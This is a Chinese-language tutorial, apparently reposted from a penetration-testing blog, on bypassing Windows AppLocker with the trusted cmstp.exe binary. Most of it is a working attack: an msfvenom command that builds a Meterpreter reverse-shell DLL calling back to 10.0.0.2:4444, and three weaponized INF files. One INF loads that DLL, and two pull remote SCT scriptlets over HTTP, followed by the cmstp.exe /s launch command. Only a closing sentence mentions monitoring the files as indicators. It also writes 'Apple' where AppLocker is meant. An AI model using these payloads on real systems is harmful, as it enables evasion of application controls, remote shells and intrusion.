CMSTP中怎么繞過AppLocker

這期內容當中小編將會給大家帶來有關CMSTP中怎么繞過AppLocker，文章內容豐富且以專業的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

CMSTP是一個與Microsoft連接管理器配置文件安裝程序關聯的二進制文件。它接受INF文件，這些文件可以通過惡意命令武器化，以腳本（SCT）和DLL的形式執行任意代碼。它是一個受信任的Microsoft二進制文件，位于以下兩個Windows目錄中。

C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe

AppLocker默認規則允許在這些文件夾中執行二進制文件，因此我們可以用它來作為bypass的一種方法。該方法最初是由Oddvar Moe發現的，使用這個二進制文件可以繞過AppLocker和UAC，具體可以參閱他的博文。

DLL

通過Metasploit Framework的msfvenom生成惡意DLL文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll &ampamp;gt; /root/Desktop/pentestlab.dll

INF文件的RegisterOCXSection需要包含惡意DLL文件的本地路徑或遠程執行的WebDAV位置。

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

Metasploit multi/handler模塊需要配置為接收連接。

當惡意INF文件與cmstp一起提供時，代碼將會在后臺執行。

cmstp.exe /s cmstp.inf

Meterpreter會話將從DLL執行中打開。

SCT

除了DLL文件外，cmstp還能夠運行SCT文件，這在紅隊操作中擴展了二進制的可用性。 Nick Tyrer最初通過Twitter展示了這種能力。

Nick Tyrer還編寫了一個名為powersct.sct的scriptlet，可以將其用作執行PowerShell命令的備選解決方案，以應對本機PowerShell被阻止的情況。UnRegisterOCXSection需要包含scriptlet的URL。最終的INF文件需要包含以下內容：

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

當INF文件被執行一個新的窗口將打開，這將允許用戶執行PowerShell命令。

cmstp.exe /s cmstp.inf

代碼執行也可以通過使用scriptlet來調用惡意可執行文件。INF文件需要包含scriptlet的遠程位置。

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/pentestlab.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"

在執行INF文件時，將會打開一個新的命令提示符窗口，這表示代碼已被成功執行。

成功獲取到一個Meterpreter會話。

總結

使用CMSTP二進制來繞過Apple限制和代碼執行。CMSTP需要INF文件并在執行時生成一個CMP文件，它是連接管理器設置文件。因此，如果惡意攻擊者已經開始使用此技術，且CMSTP.EXE二進制無法被AppLocker規則阻止的情況下，則需要將這兩個文件作為IoC進行監視。

上述就是小編為大家分享的CMSTP中怎么繞過AppLocker了，如果剛好有類似的疑惑，不妨參照上述分析進行理解。如果想知道更多相關知識，歡迎關注億速云行業資訊頻道。